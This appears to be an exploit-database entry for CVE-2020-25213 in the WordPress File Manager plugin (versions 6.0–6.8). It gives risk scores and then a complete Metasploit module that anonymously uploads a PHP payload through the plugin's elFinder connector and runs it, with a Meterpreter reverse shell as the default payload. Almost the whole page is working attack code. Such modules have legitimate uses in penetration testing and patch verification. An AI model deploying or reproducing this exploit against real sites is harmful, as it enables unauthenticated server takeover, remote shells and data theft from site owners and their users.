WordPress File Manager 6.8 Remote Code Execution

2020.11.10
Risk: High
Local: No
Remote: Yes
CWE: CWE-434


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HTTP::Wordpress prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution', 'Description' => %q{ The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory. }, 'License' => MSF_LICENSE, 'Author' => [ 'Alex Souza (w4fz5uck5)', # initial discovery and PoC 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module ], 'References' => [ [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ], [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ], [ 'CVE', '2020-25213' ] ], 'Platform' => [ 'php' ], 'Privileged' => false, 'Arch' => ARCH_PHP, 'Targets' => [ [ 'WordPress File Manager 6.0-6.8', { 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' } } ] ], 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020 'DefaultTarget' => 0 ) ) register_options( [ OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']), OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]]) ] ) end def check return CheckCode::Unknown unless wordpress_and_online? # check the plugin version from readme check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0') end def exploit # base path to File Manager plugin file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager') # filename of the file to be uploaded/created filename = "#{Rex::Text.rand_text_alphanumeric(6)}.php" register_file_for_cleanup(filename) case datastore['COMMAND'] when 'upload' elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename) when 'mkfile+put' elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename) elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename) end payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename) print_status("#{peer} - Payload is at #{payload_uri}") # execute the payload send_request_cgi('uri' => normalize_uri(payload_uri)) end # make it easier to switch between "upload" and "mkfile+put" exploit methods def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {}) filename = opts['filename'] # prep for exploit post_data = Rex::MIME::Message.new post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name="cmd"') case elfinder_cmd when 'upload' post_data.add_part('l1_', nil, nil, 'form-data; name="target"') post_data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"upload[]\"; filename=\"#{filename}\"") when 'mkfile' post_data.add_part('l1_', nil, nil, 'form-data; name="target"') post_data.add_part(filename, nil, nil, 'form-data; name="name"') when 'put' post_data.add_part("l1_#{Rex::Text.encode_base64(filename)}", nil, nil, 'form-data; name="target"') post_data.add_part(payload.encoded, nil, nil, 'form-data; name="content"') end res = send_request_cgi( 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'), 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'data' => post_data.to_s ) fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") unless res.code == 200 end end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top